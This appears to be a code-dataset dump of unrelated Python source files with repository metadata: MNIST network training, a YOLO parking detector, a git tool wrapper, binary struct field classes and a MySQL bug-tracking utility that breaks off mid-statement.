self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
self.params['b2'] = np.zeros(output_size)
def predict(self, x):
W1, W2 = self.params['W1'], self.params['W2']
b1, b2 = self.params['b1'], self.params['b2']
l = sigmoid(np.dot(x, W1) + b1)
y = softmax(np.dot(l, W2) + b2)
return y
def loss(self, x, t):
y = self.predict(x)
return cross_entropy_error(y, t)
def accuracy(self, x, t):
y = self.predict(x)
y = np.argmax(y, axis=1)
t = np.argmax(t, axis=1)
accuracy = np.sum(y == t) / float(x.shape[0])
return accuracy
def numerical_gradient(self, x, t):
loss_W = lambda W: self.loss(x, t)
grads = {}
grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
return grads
def gradient(self, x, t):
W1, W2 = self.params['W1'], self.params['W2']
b1, b2 = self.params['b1'], self.params['b2']
grads = {}
batch_num = x.shape[0]
a1 = np.dot(x, W1) + b1
z1 = sigmoid(a1)
a2 = np.dot(z1, W2) + b2
y = softmax(a2)
dy = (y - t) / batch_num
grads['W2'] = np.dot(z1.T, dy)
grads['b2'] = np.sum(dy, axis=0)
da1 = np.dot(dy, W2.T)
dz1 = sigmoid_grad(a1) * da1
grads['W1'] = np.dot(x.T, dz1)
grads['b1'] = np.sum(dz1, axis=0)
return grads
# 1. Divide a dataset into training data and test data
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)
iters_num = 10000
train_size = x_train.shape[0]
batch_size = 100
learning_rate = 0.1
train_loss_list = []
train_acc_list = []
test_acc_list = []
iter_per_epoch = max(train_size / batch_size, 1)
for i in range(iters_num):
# 2. Select part of training data (mini-batch) randomly
batch_mask = np.random.choice(train_size, batch_size)
x_batch = x_train[batch_mask]
t_batch = t_train[batch_mask]
# 3. Calculate the gradient to reduce the value of the loss function
grad = network.gradient(x_batch, t_batch)
# 4. Update weights with the gradient
for key in ('W1', 'b1', 'W2', 'b2'):
network.params[key] -= learning_rate * grad[key]
loss = network.loss(x_batch, t_batch)
train_loss_list.append(loss)
if i % iter_per_epoch == 0:
train_acc = network.accuracy(x_train, t_train)
test_acc = network.accuracy(x_test, t_test)
train_acc_list.append(train_acc)
test_acc_list.append(test_acc)
print("train acc, test acc | " + str(train_acc) + ", " + str(test_acc))
markers = {'train': 'o', 'test': 's'}
x = np.arange(len(train_acc_list))
plt.plot(x, train_acc_list, label='train acc')
plt.plot(x, test_acc_list, label='test acc', linestyle='--')
plt.xlabel("epochs")
plt.ylabel("accuracy")
plt.ylim(0, 1.0)
plt.legend(loc='lower right')
plt.show()
| 28.967742 | 87 | 0.615813 |
bf253f69f80fef497fa099acbae004b228790867 | 391 | py | Python | sistema/setup.py | rdenadai/Lotofacil | 3f0144619a9f2a8ccd5792907c27c9cc4eafc38f | [
"MIT"
] | null | null | null | sistema/setup.py | rdenadai/Lotofacil | 3f0144619a9f2a8ccd5792907c27c9cc4eafc38f | [
"MIT"
] | null | null | null | sistema/setup.py | rdenadai/Lotofacil | 3f0144619a9f2a8ccd5792907c27c9cc4eafc38f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#!/usr/bin/env python
from distutils.core import setup
from Cython.Build import cythonize
import os
LOCAL_INSTANCE = lambda *args: os.path.join(os.path.dirname(__file__), *args)
PROJECT_PATH = os.path.dirname(os.path.abspath(__file__))
print os.path.join(PROJECT_PATH, 'importar.pyx')
setup(
ext_modules=cythonize(os.path.join(PROJECT_PATH, 'importar.pyx'))
)
| 26.066667 | 77 | 0.746803 |
faf93c3f0e99fad70b7cb48ffd0bed98555261a3 | 303 | py | Python | data/multilingual/Latn.IDO/Sans_12/pdf_to_json_test_Latn.IDO_Sans_12.py | antoinecarme/pdf_to_json_tests | d57a024fde862e698d916a1178f285883d7a3b2f | [
"BSD-3-Clause"
] | 1 | 2021-09-19T19:47:35.000Z | 2021-09-19T19:47:35.000Z | data/multilingual/Latn.IDO/Sans_12/pdf_to_json_test_Latn.IDO_Sans_12.py | antoinecarme/pdf_to_json_tests | d57a024fde862e698d916a1178f285883d7a3b2f | [
"BSD-3-Clause"
] | null | null | null | data/multilingual/Latn.IDO/Sans_12/pdf_to_json_test_Latn.IDO_Sans_12.py | antoinecarme/pdf_to_json_tests | d57a024fde862e698d916a1178f285883d7a3b2f | [
"BSD-3-Clause"
] | null | null | null | import pdf_to_json as p2j
import json
url = "file:data/multilingual/Latn.IDO/Sans_12/udhr_Latn.IDO_Sans_12.pdf"
lConverter = p2j.pdf_to_json.pdf_to_json_converter()
lConverter.mImageHashOnly = True
lDict = lConverter.convert(url)
print(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))
| 30.3 | 73 | 0.811881 |
02f4be186d53c5313d3c5160408b0301836d579c | 350 | py | Python | main.py | Ponce-1/SeniorProject-Clone | 633f32798ac192c5bf7636212115cc7c1ec0e7a0 | [
"MIT"
] | null | null | null | main.py | Ponce-1/SeniorProject-Clone | 633f32798ac192c5bf7636212115cc7c1ec0e7a0 | [
"MIT"
] | null | null | null | main.py | Ponce-1/SeniorProject-Clone | 633f32798ac192c5bf7636212115cc7c1ec0e7a0 | [
"MIT"
] | null | null | null | from yoloParkingDetector import yoloParkingDetector
vid = "model.avi"
classFile = "yolov3.txt"
weightsFile = "yolov3.weights"
configFile = "yolov3.cfg"
yml = "parking.yml"
json = "parkingData.json"
# Pass in zero as first argument for live feed
myDetector = yoloParkingDetector(vid, classFile, weightsFile, configFile, yml, json)
myDetector.run()
| 25 | 84 | 0.771429 |
b91e7e6236dec68d5d79f93a59b30ca2f0b0d7e2 | 677 | py | Python | tests/functional/test_app_main.py | Alex-T13/sts_13_on_FastAPI | aab2a5b542b75230c7f0d7bdcdad292f424c638c | [
"MIT"
] | 3 | 2020-11-03T23:49:28.000Z | 2020-11-13T07:25:33.000Z | tests/functional/test_app_main.py | Alex-T13/sts_13_on_FastAPI | aab2a5b542b75230c7f0d7bdcdad292f424c638c | [
"MIT"
] | 1 | 2020-11-05T11:17:40.000Z | 2020-11-05T11:17:40.000Z | tests/functional/test_app_main.py | Alex-T13/sts_13_without_FastAPI | aab2a5b542b75230c7f0d7bdcdad292f424c638c | [
"MIT"
] | 1 | 2021-01-26T19:45:37.000Z | 2021-01-26T19:45:37.000Z | import pytest
from tests.functional.pages.main import MainPage
from tests.functional.util.consts import URL_LANDING
from tests.functional.util.util import screenshot_on_failure
@pytest.mark.functional
@screenshot_on_failure
def test(browser, request):
page = MainPage(browser, URL_LANDING)
validate_title(page)
validate_content(page)
def validate_title(page: MainPage):
assert "Z37" in page.title
def validate_content(page: MainPage):
assert page.h1.tag_name == "h1"
assert page.h1.text == "Z37 study project"
assert page.p.tag_name == "p"
assert page.p.text == "This is a study project."
html = page.html
assert "<hr>" in html
| 23.344828 | 60 | 0.734121 |
c753e9a392b583df5284d620c16fdc16d1a76e56 | 1,335 | py | Python | lisa/tools/git.py | squirrelsc/LISA | 91ee86f1aa391b9290c3ab80efde55d75a26b8d7 | [
"MIT"
] | 1 | 2022-03-15T01:48:29.000Z | 2022-03-15T01:48:29.000Z | lisa/tools/git.py | squirrelsc/LISA | 91ee86f1aa391b9290c3ab80efde55d75a26b8d7 | [
"MIT"
] | null | null | null | lisa/tools/git.py | squirrelsc/LISA | 91ee86f1aa391b9290c3ab80efde55d75a26b8d7 | [
"MIT"
] | null | null | null | import pathlib
import re
from lisa.executable import Tool
from lisa.operating_system import Linux
from lisa.util import LisaException, get_matched_str
class Git(Tool):
CODE_FOLDER_PATTERN = re.compile(r"Cloning into '(.+)'")
@property
def command(self) -> str:
return "git"
@property
def can_install(self) -> bool:
return True
def _install(self) -> bool:
if isinstance(self.node.os, Linux):
self.node.os.install_packages([self])
else:
raise LisaException(
"Doesn't support to install git in Windows. "
"Make sure git is installed and in PATH"
)
return self._check_exists()
def clone(
self, url: str, cwd: pathlib.PurePath, branch: str = "", dir_name: str = ""
) -> None:
cmd = f"clone {url} {dir_name}"
# git print to stderr for normal info, so set no_error_log to True.
result = self.run(cmd, cwd=cwd, no_error_log=True)
code_dir = get_matched_str(result.stderr, self.CODE_FOLDER_PATTERN)
full_path = cwd / code_dir
if branch:
self.checkout(branch, cwd=full_path)
def checkout(self, branch: str, cwd: pathlib.PurePath) -> None:
self.run(f"checkout {branch}", cwd=cwd, no_info_log=True, no_error_log=True)
| 30.340909 | 84 | 0.62397 |
9662060b0e81bb18132c8f1b311ed92fbf0462bc | 16,268 | py | Python | packing_tape/field_classes.py | psobot/packing-tape | 62a3ac9ddb1df4cdf8ca753e460da44b4c5ac6d5 | [
"MIT"
] | 3 | 2018-07-06T04:34:46.000Z | 2021-05-02T04:54:02.000Z | packing_tape/field_classes.py | psobot/packing-tape | 62a3ac9ddb1df4cdf8ca753e460da44b4c5ac6d5 | [
"MIT"
] | null | null | null | packing_tape/field_classes.py | psobot/packing-tape | 62a3ac9ddb1df4cdf8ca753e460da44b4c5ac6d5 | [
"MIT"
] | null | null | null | from struct import unpack_from, pack, calcsize
from bases import BinaryProperty, \
LogicalProperty, \
DummyProperty, \
Nameable, \
Validatable, \
Parseable, \
Serializable, \
Storable, \
StorageTarget
class ByteAlignedStructField(
property,
BinaryProperty,
LogicalProperty,
Validatable,
Nameable,
Parseable,
Serializable,
Storable
):
def __init__(
self,
format_string,
size,
signed,
endianness,
index,
default=0,
validate=None
):
super(ByteAlignedStructField, self).__init__(
fget=self.get, fset=self.set)
self.format_string = format_string
self.size = size
self.signed = signed
self.endianness = endianness
self.index = index
self.default = default
self.validator = validate
def initialize_with_default(self, instance):
self.set(instance, self.default)
def parse_and_get_size(self, stream):
return (
unpack_from(self.format_string, stream, 0)[0],
calcsize(self.format_string)
)
@property
def min_size(self):
return calcsize(self.format_string)
def serialize(self, instance):
return pack(self.format_string, self.get(instance))
def __repr__(self):
attrs = (
"field_name",
"format_string",
"size",
"signed",
"endianness",
"index",
)
return "<%s %s>" % (
self.__class__.__name__,
" ".join([
"%s=%s" % (attr, getattr(self, attr))
for attr in attrs
])
)
class StringField(
property,
BinaryProperty,
LogicalProperty,
Validatable,
Nameable,
Parseable,
Serializable,
Storable
):
def __init__(
self,
size,
index,
null_terminated=True,
default='',
validate=None
):
super(StringField, self).__init__(
fget=self.get, fset=self.set)
self.size = size
self.index = index
self.null_terminated = null_terminated
self.default = default
self.validator = validate
@property
def sort_order(self):
return self.index
def initialize_with_default(self, instance):
self.set(instance, self.default)
@property
def format_string(self):
return str(self.size) + 's'
def parse_and_get_size(self, stream):
return (
unpack_from(self.format_string, stream, 0)[0].rstrip("\x00"),
calcsize(self.format_string)
)
@property
def min_size(self):
return calcsize(self.format_string)
def serialize(self, instance):
if self.null_terminated:
return pack(self.format_string, self.get(instance))[:-1] + "\x00"
else:
return pack(self.format_string, self.get(instance))
def __repr__(self):
attrs = (
"field_name",
"size",
"index",
)
return "<%s %s>" % (
self.__class__.__name__,
" ".join([
"%s=%s" % (attr, getattr(self, attr))
for attr in attrs
])
)
class EmbeddedField(
property,
BinaryProperty,
LogicalProperty,
Validatable,
Nameable,
Parseable,
Serializable,
Storable
):
def __init__(
self,
struct_type,
index,
default=None,
validate=None
):
super(EmbeddedField, self).__init__(
fget=self.get, fset=self.set)
self.struct_type = struct_type
self.index = index
self.default = default
self.validator = validate
def get_size(self, instance):
return len(self.get(instance))
@property
def sort_order(self):
return self.index
def initialize_with_default(self, instance):
self.set(instance, self.default)
def parse_and_get_size(self, stream):
instance = self.struct_type.parse_from(stream, allow_invalid=True)
return instance, len(instance)
@property
def min_size(self):
return self.struct_type.min_size()
def serialize(self, instance):
return self.get(instance).serialize()
def validate(self, instance, raise_exception=True):
value = self.get(instance)
if value is None:
return True
return self.validate_value(value, raise_exception, instance)
def validate_value(self, value, raise_exception=False, instance='unknown'):
if self.validator is not None:
if self.validator(value):
pass
elif not raise_exception:
return False
else:
try:
field_name = self.field_name
except:
field_name = self
raise ValueError(
'Field "%s" is invalid (value "%s", instance %s)' % (
field_name, value, instance))
return value.validate(raise_exception=raise_exception)
def __repr__(self):
attrs = (
"field_name",
"struct_type",
"index",
"default",
)
return "<%s %s>" % (
self.__class__.__name__,
" ".join([
"%s=%s" % (attr, getattr(self, attr))
for attr in attrs
])
)
class SwitchField(
property,
BinaryProperty,
LogicalProperty,
Validatable,
Nameable,
Parseable,
Serializable,
Storable
):
def __init__(
self,
subfields,
index,
default=None
):
super(SwitchField, self).__init__(
fget=self.get, fset=self.set)
self.subfields = subfields
self.index = index
self.default = default
def get_size(self, instance):
return self.get_real_type(instance).get_size(instance)
@property
def sort_order(self):
return self.index
def initialize_with_default(self, instance):
self.set(instance, self.default)
def get_real_type(self, instance):
return super(SwitchField, self).get(instance)
def set_real_type(self, instance, type):
super(SwitchField, self).set(instance, type)
def get(self, instance):
real_type = self.get_real_type(instance)
if real_type:
return real_type.get(instance)
else:
return None
def set(self, instance, val):
for subfield in self.subfields:
if subfield.validate_value(val, raise_exception=False):
subfield.set(instance, val)
self.set_real_type(instance, subfield)
return
def parse_and_get_size(self, stream):
for subfield in self.subfields:
if len(stream) < subfield.min_size:
continue
result, size = subfield.parse_and_get_size(stream)
# TODO: Expose a better API from subfields so that we don't
# have to do this hackety hack:
if subfield.validate_value(result, raise_exception=False):
return result, size
if all(len(stream) < subfield.min_size for subfield in self.subfields):
raise ValueError(
"All subfields had minimum sizes greater than the available "
"data - no subfields parsed! (stream = %s)" % repr(stream))
else:
raise ValueError("No subfields parsed! (stream = %s)" % repr(
stream))
@property
def min_size(self):
return min([s.min_size for s in self.subfields])
def serialize(self, instance):
return self.get_real_type(instance).serialize(instance)
def validate(self, instance, raise_exception=True):
real_type = self.get_real_type(instance)
if not real_type:
if raise_exception:
raise ValueError("No valid subfields found for %s" % self)
else:
return False
val = self.get(instance)
return real_type.validate_value(
val,
raise_exception=raise_exception,
instance=instance)
def validate_value(self, val, raise_exception=True, instance='unknown'):
for subfield in self.subfields:
if subfield.validate_value(val, raise_exception=False):
real_type = subfield
break
else:
if raise_exception:
raise ValueError(
"No valid subfields would accept value %s for %s" % (
val, self))
else:
return False
return real_type.validate_value(
val,
raise_exception=raise_exception,
instance=instance)
def __repr__(self):
attrs = (
"field_name",
"subfields",
"index",
"default",
)
return "<%s %s>" % (
self.__class__.__name__,
" ".join([
"%s=%s" % (attr, getattr(self, attr))
for attr in attrs
])
)
class ArrayField(
property,
BinaryProperty,
LogicalProperty,
Validatable,
Nameable,
Parseable,
Serializable,
Storable
):
def __init__(
self,
subfield,
index,
default=None # TODO: add minimum and maximum number of elements?
):
super(ArrayField, self).__init__(
fget=self.get, fset=self.set)
self.subfield = subfield
self.index = index
self.default = default
def get_size(self, instance):
return sum([
self.subfield.get_size(target)
for target in super(ArrayField, self).get(instance)
])
@property
def sort_order(self):
return self.index
def initialize_with_default(self, instance):
self.set(instance, self.default)
def get_storage_targets(self, instance):
return super(ArrayField, self).get(instance)
def set_storage_targets(self, instance, targets):
return super(ArrayField, self).set(instance, targets)
def get(self, instance):
targets = super(ArrayField, self).get(instance)
return [self.subfield.get(target) for target in targets]
def set(self, instance, vals):
if not isinstance(vals, list) and not isinstance(vals, tuple):
raise ValueError(
"This property (%s) requires an array or tuple value." % (
instance))
# Create a new StorageTarget for each of the sub-values present.
self.set_storage_targets(instance, [StorageTarget() for _ in vals])
# Call the subfield's setter but passing each of these targets
# instead of the original instance.
for target, val in zip(self.get_storage_targets(instance), vals):
self.subfield.set(target, val)
def parse_and_get_size(self, stream):
results = []
total_size = 0
while (total_size + self.subfield.min_size) <= len(stream):
result, size = self.subfield.parse_and_get_size(
stream[total_size:])
if not self.subfield.validate_value(result, raise_exception=False):
break
results.append(result)
total_size += size
return results, total_size
@property
def min_size(self):
return 0
def serialize(self, instance):
targets = super(ArrayField, self).get(instance)
return "".join([
self.subfield.serialize(target)
for target in targets
])
def validate(self, instance, raise_exception=True):
values = self.get(instance)
storage_targets = self.get_storage_targets(instance)
if values:
return all([
self.subfield.validate_value(
value,
raise_exception=raise_exception,
instance=target)
for (target, value) in zip(storage_targets, values)
])
else:
return True
def __repr__(self):
attrs = (
"field_name",
"subfield",
"index",
"default",
)
return "<%s %s>" % (
self.__class__.__name__,
" ".join([
"%s=%s" % (attr, getattr(self, attr))
for attr in attrs
])
)
class Empty(property, DummyProperty, Serializable, Storable):
def __init__(self, index, size):
super(Empty, self).__init__(
fget=self.get, fset=self.set)
self.index = index
self.size = size
default = 0
def initialize_with_default(self, instance):
pass
def serialize(self, instance):
return "\x00" * self.size
def parse_and_get_size(self, instance):
return None, self.size
@property
def min_size(self):
return self.size
class Bit(object):
size = 1
def __init__(self, default=False, validate=None):
self.default = default
self.validator = validate
class FieldProxy(property, LogicalProperty, Nameable):
parent = None
@property
def sort_order(self):
return self.parent.sort_order + (self.index / self.parent.field_count)
class ProxyTarget:
pass
class BitProxy(FieldProxy, Validatable):
def __init__(self, parent, bit_index, default=False, validate=None):
super(BitProxy, self).__init__(
fget=self.get,
fset=self.set)
self.parent = parent
self.bit_index = bit_index
self.bitmask = 1 << (7 - self.bit_index)
self.default = default
self.validator = validate
size = 1
@property
def index(self):
return self.parent.index
def get(self, instance):
value = self.parent.get(instance)
if isinstance(value, str):
asint = ord(value)
else:
asint = value
return bool(asint & self.bitmask)
def set(self, instance, value):
existing_field_value = self.parent.get(instance)
existing_field_value &= ~self.bitmask
if value:
existing_field_value |= self.bitmask
return self.parent.set(instance, existing_field_value)
class Bitfield(property, ProxyTarget, BinaryProperty, Parseable,
Serializable,
Storable, Nameable):
size = 1
min_size = 1
field_count = 8
def __init__(self, index, *members):
super(Bitfield, self).__init__(
fget=self.get,
fset=self.set)
if sum([m.size for m in members]) != self.field_count:
raise ValueError(
"Members passed to Bitfield must sum to %d "
"bits (got: %s)." % (
self.field_count,
[m.size for m in members]))
self.members = members
self.index = index
@property
def sort_order(self):
return self.index
def parse_and_get_size(self, stream):
return (unpack_from('B', stream, 0)[0], self.size)
def serialize(self, instance):
return pack('B', self.get(instance))
def initialize_with_default(self, instance):
default = 0
defaults = [member.default for member in self.members]
for i, bit_default in enumerate(defaults):
default <<= 1
default |= 1 if bit_default else 0
self.set(instance, default)
def __repr__(self):
return "<%s index=%d members=%s>" % (
self.__class__.__name__,
self.index,
" ".join([str(member) for member in self.members])
)
def expand(self):
results = []
index = 0
for m in self.members:
if isinstance(m, Bit):
results.append(BitProxy(self, index, m.default, m.validator))
index += 1
elif isinstance(m, Empty):
index += m.size
return results
| 26.978441 | 79 | 0.564482 |
e2f53f8a279f27b22532899f4c07a671e59846b9 | 1,237 | py | Python | dwg/config.py | revsic/torch-diffusion-wavegan | e72765abe238c6d3e29d82e8e17a8f33f06ab6b6 | [
"MIT"
] | 12 | 2022-02-28T06:46:11.000Z | 2022-03-20T05:42:20.000Z | dwg/config.py | revsic/torch-diffusion-wavegan | e72765abe238c6d3e29d82e8e17a8f33f06ab6b6 | [
"MIT"
] | null | null | null | dwg/config.py | revsic/torch-diffusion-wavegan | e72765abe238c6d3e29d82e8e17a8f33f06ab6b6 | [
"MIT"
] | 3 | 2022-03-01T01:24:53.000Z | 2022-03-20T03:38:07.000Z | import numpy as np
class Config:
"""DiffusionWaveGAN configurations.
"""
def __init__(self, mel: int):
"""Initializer.
Args:
mel: spectrogram channels.
"""
self.mel = mel
# diffusion steps
self.steps = 4
# schedules
self.internals = 1024
self.logit_max = 10
self.logit_min = -10
# block
self.channels = 64
self.kernels = 3
self.dilations = 2
# embedder
self.pe = 128
self.embeddings = 512
self.mappings = 2
# latent mapper
self.mapchannels = 8
self.mapkernels = 5
self.maplayers = 2
# upsampler
self.upkernels = 5
self.upscales = [4, 4, 4, 4]
self.leak = 0.2
# wavenet
self.cycles = 3
self.layers = 10
def betas(self) -> np.ndarray:
"""Beta values.
"""
steps = np.arange(1, self.steps + 1)
# [S]
betas = 1 - np.exp(
-self.beta_min / self.steps - 0.5 * (
self.beta_max - self.beta_min
) * (2 * steps - 1) * self.steps ** -2)
# [S + 1]
return np.concatenate([[0.], betas])
| 21.701754 | 51 | 0.47696 |
3df7532f0c55396a3779628248426f7fbd8b62aa | 373 | py | Python | preprocessor/cleaner.py | mmcenta/missing-link | d4edea5c2a18ac90004d33757d93769af8bc3251 | [
"MIT"
] | null | null | null | preprocessor/cleaner.py | mmcenta/missing-link | d4edea5c2a18ac90004d33757d93769af8bc3251 | [
"MIT"
] | null | null | null | preprocessor/cleaner.py | mmcenta/missing-link | d4edea5c2a18ac90004d33757d93769af8bc3251 | [
"MIT"
] | null | null | null | from string import punctuation, digits
class Cleaner:
def __init__(self, filter=(punctuation + digits)):
self.filter = filter
def clean(self, text):
text = text.replace("\n", " ").replace("\r", " ")
text = text.translate(str.maketrans(dict.fromkeys(self.filter, " ")))
return text.translate(str.maketrans(dict.fromkeys("'`", "")))
| 33.909091 | 77 | 0.624665 |
5ba9d9a483b28812419b5701357c84bf86a46307 | 49,794 | py | Python | py/dbutils.py | tiaodan/bugcount_flask | 7cb8aaf486e7d845acb3d5f42e73919ee939d979 | [
"MulanPSL-1.0"
] | null | null | null | py/dbutils.py | tiaodan/bugcount_flask | 7cb8aaf486e7d845acb3d5f42e73919ee939d979 | [
"MulanPSL-1.0"
] | null | null | null | py/dbutils.py | tiaodan/bugcount_flask | 7cb8aaf486e7d845acb3d5f42e73919ee939d979 | [
"MulanPSL-1.0"
] | null | null | null | import xlrd
import xlwt
import pymysql
import json
# 引入python中的traceback模块,跟踪错误
import traceback
import os
import xlsxwriter
from py import utils
from collections import Counter
from datetime import datetime
# 数据库配置
"""
db_host = 'localhost'
db_user = 'root'
db_passwd = 'sunkaisens'
db_dbname = 'bugcount'
"""
print('<dbutil.py>获取。。。。。。。。。。。。。。。。config文件 start')
db_config_dict = utils.get_dbargs_from_config_byabspath()
db_host = db_config_dict['db_host']
db_user = db_config_dict['db_user']
db_passwd = db_config_dict['db_passwd']
db_dbname = db_config_dict['db_dbname']
print('<dbutil.py>获取。。。。。。。。。。。。。。。。config文件 end ')
# 初始化变量
currentpath = os.path.abspath(__file__)
print('当前路径', currentpath)
rootdir = os.path.abspath(os.path.dirname(currentpath) + os.path.sep + '..') # 当前路径上一层
print('根目录==', rootdir)
# 定义一个字典,用于英文表头--》中文表头
tableheaddict = {
"bug_submit_date": "提交日期",
"project": "项目",
"software": "软件类",
"test_version": "测试版本",
"bug_description": "描述",
"severity_level": "严重等级",
"priority": "优先级",
"bug_difficulty": "难度",
"bug_status": "关闭情况",
"bug_close_date": "关闭日期",
"close_version": "关闭版本",
"cause_analysis": "原因分析",
"bug_img": "问题图片",
"intermediate_situation": "中间情况",
"developer": "开发者",
"remark": "备注",
"regression_times": "回归次数",
"reopen_times": "重开次数",
"submitterindex": "提交者索引",
None: "" # 导出的表格不能出现None,因为再次导入,日期格式如果是None会报错.可以直接使用aa[None] 调用
}
# 数据库操作
class DB():
def __init__(self, host='localhost', port=3306, db='', user='root', passwd='sunkaisens', charset='utf8'):
# 建立连接
self.conn = pymysql.connect(host=host, port=port, db=db, user=user, passwd=passwd, charset=charset)
# 创建游标,操作设置为字典类型
self.cur = self.conn.cursor(cursor=pymysql.cursors.DictCursor)
def __enter__(self):
# 返回游标
return self.cur
def __exit__(self, exc_type, exc_val, exc_tb):
# 提交数据库并执行
self.conn.commit()
# 关闭游标
self.cur.close()
# 关闭数据库连接
self.conn.close()
# 定义数据库操作
# 参数 ip 用户名 密码 数据库名,必须要传1个参数
def withDB(sql1, *sqlN):
# with DB(host='localhost', user='root', passwd='123456', db='bugcount') as db:
with DB(host=db_host, user=db_user, passwd=db_passwd, db=db_dbname) as db:
# db.execute('show databases')
# 默认执行第一条语句
db.execute(sql1)
# 执行结果
print(db)
for i in db:
print(i)
# 查询方法参数个数,根据参数个数执行语句
print("sql1==", sql1)
print("sqlN==", sqlN)
fun_args_nums = len(sqlN)
print("方法参数个数有: %s " % len(sqlN))
print("不确定参数,第一个数为====", sqlN[0])
if fun_args_nums == 1:
# 执行第二条语句
db.execute(sqlN[0])
# 执行结果
print(db)
for i in db:
print(i)
db.close()
# 测试链接,打印版本
def db_test():
# 打开数据库连接
db = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = db.cursor()
# 使用 execute() 方法执行 SQL 查询
cursor.execute("SELECT VERSION()")
# 使用 fetchone() 方法获取单条数据.
data = cursor.fetchone()
print("Database version : %s " % data)
# 关闭数据库连接
cursor.close()
db.close()
# 打开数据库
# 1. sql 2. 参数后面的匹配变量
def execute_db_onesql_nouse(sql, *args):
# 初始化返回的数据 [arg1, arg2, arg3, arg4] arg1=状态码(num)arg2=msg(str) arg3= count(num) arg4=tuple
code = 500 # 默认失败
msg = 'sql语句执行失败'
count = 0 # sql语句执行结果个数
sql_return_result_tuple = () # 执行sql会返回tuple
# 打开数据库连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# print(f'sql语句为==', sql)
# print("*args====", args)
# print('参数args类型=={args}', type(args))
# 使用 cursor() 方法创建一个游标对象 cursor
cursor = conn.cursor()
# 使用 execute() 方法执行 SQL 查询
try:
# 执行sql语句
cursor.execute(sql, args)
# 提交到数据库执行
conn.commit()
# 执行语句,返回结果
sql_return_result_tuple = cursor.fetchall()
print("执行语句返回结果:", sql_return_result_tuple) # 返回元组
print("执行语句返回结果个数:", len(sql_return_result_tuple)) # 返回元组
print("执行语句返回结果(类型)==", type(sql_return_result_tuple))
print("sql语句执行成功")
# 转化下查询结果为{},{},{}这种格式
count = len(sql_return_result_tuple) # sql语句结果个数
# 拼接返回数据,返回列表
code = 200 # 成功
msg = 'sql语句执行成功'
return_list = [code, msg, count, sql_return_result_tuple]
print(f'《返回结果》 return_list===={return_list}')
print('拼接返回给 《调用者》 的 数据类型====', type(return_list))
except:
# 如果发生错误则回滚
print('sql语句执行失败')
conn.rollback()
# 拼接返回数据,返回列表
return_list = [code, msg, count, sql_return_result_tuple]
print('sql异常 执行sql 返回的数据====', return_list)
finally:
# 不管是否异常,都关闭数据库连接
cursor.close()
conn.close()
return return_list
# 通过excel导入mysql
def import_mysql_by_excel():
# json数据
data = {}
buglist = []
# 默认定义数据
code = 500 # 默认失败
msg = '导入失败'
count = 0 # sql语句执行结果个数
isrepeat = 0 # 1有,0没有
repeatlist = [] # 提交者索引 重复内容
# 打开数据所在的工作簿,以及选择存有数据的工作表
# book = xlrd.open_workbook("../excel_upload/buglist.xls")
tablehead = ['提交日期', '项目', '软件类', '测试版本', '描述',
'严重等级', '优先级', '难度', '关闭情况', '关闭日期',
'关闭版本', '原因分析', '问题图片', '中间情况', '开发者',
'备注', '回归次数', '重开次数', '提交者索引']
book = xlrd.open_workbook("./excel_upload/template.xlsx")
# 1. 检测xecel表格内容是否符合标准
is_exceldata_ok_jsonstr = utils.checkexcel_data("./excel_upload/template.xlsx", tablehead)
is_exceldata_ok_jsonobj = json.loads(is_exceldata_ok_jsonstr)
check_excel_code = is_exceldata_ok_jsonobj['code']
if check_excel_code == 200:
# 建立一个MySQL连接
conn = pymysql.connect(db_host, db_user, db_passwd, db_dbname)
# 获得游标
cur = conn.cursor()
# 1. 读取每一个sheet名称,并将可见的sheet组成一个list
sheetnames = book.sheet_names()
showsheet_names = list()
hidesheet_names = list()
for sheetname in sheetnames:
sheet = book.sheet_by_name(sheetname)
if sheet.visibility == 0: # 可见
showsheet_names.append(sheet.name)
else: # ==1 不可见
hidesheet_names.append(sheet.name)
print("??????????????显示sheet==", showsheet_names)
print("??????????????隐藏sheet==", hidesheet_names)
print("??????sheets===", sheetnames)
# 2. 循环写入数据
for showsheet_name in showsheet_names:
print('????当前sheet==', showsheet_name)
sheet = book.sheet_by_name(showsheet_name)
# sheet = book.sheet_by_name("Sheet1")
# 创建插入SQL语句 带第一次回归、第二次回归、第三次回归相关列表的sql
# query = 'insert into bugcount.buglist (name,sex,minzu,danwei_zhiwu,phone_number,home_number) values (%s, %s, %s, %s, %s, %s)'
# query = 'INSERT INTO `buglist` VALUES ('2', '2020-01-10', '1808', 'icss', 'icss_disp_20200108', '调度台无法强插', '3', '2', '2', '1', '0', null, null, null, null, '李东东', null, null, null, null, null, null, null, null, null, null);'
# sql = 'insert into bugcount.buglist (bugid, bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty, bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer, remark, first_bug_regression_date, first_bug_regression_status, first_bug_regression_remark, second_bug_regression_date, second_bug_regression_status, second_bug_regression_remark, third_bug_regression_date, third_bug_regression_status, third_bug_regression_remark) ' \
# 'values (null, %s, %s, %s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s) ' \
# 'on duplicate key update bug_submit_date=%s,project=%s,software=%s,test_version=%s,severity_level=%s,priority=%s,bug_difficulty=%s,bug_status=%s,bug_close_date=%s,close_version=%s,cause_analysis=%s,bug_img=%s,intermediate_situation=%s,developer=%s,remark=%s' \
# ',first_bug_regression_date=%s,first_bug_regression_status=%s,first_bug_regression_remark=%s,second_bug_regression_date=%s,second_bug_regression_status=%s,second_bug_regression_remark=%s,third_bug_regression_date=%s,third_bug_regression_status=%s,third_bug_regression_remark=%s'
sql = 'insert into bugcount.buglist (bugid, bug_submit_date, project, software, test_version, bug_description, severity_level, priority, bug_difficulty, bug_status, bug_close_date, close_version, cause_analysis, bug_img, intermediate_situation, developer, remark, regression_times, reopen_times, submitterindex) ' \
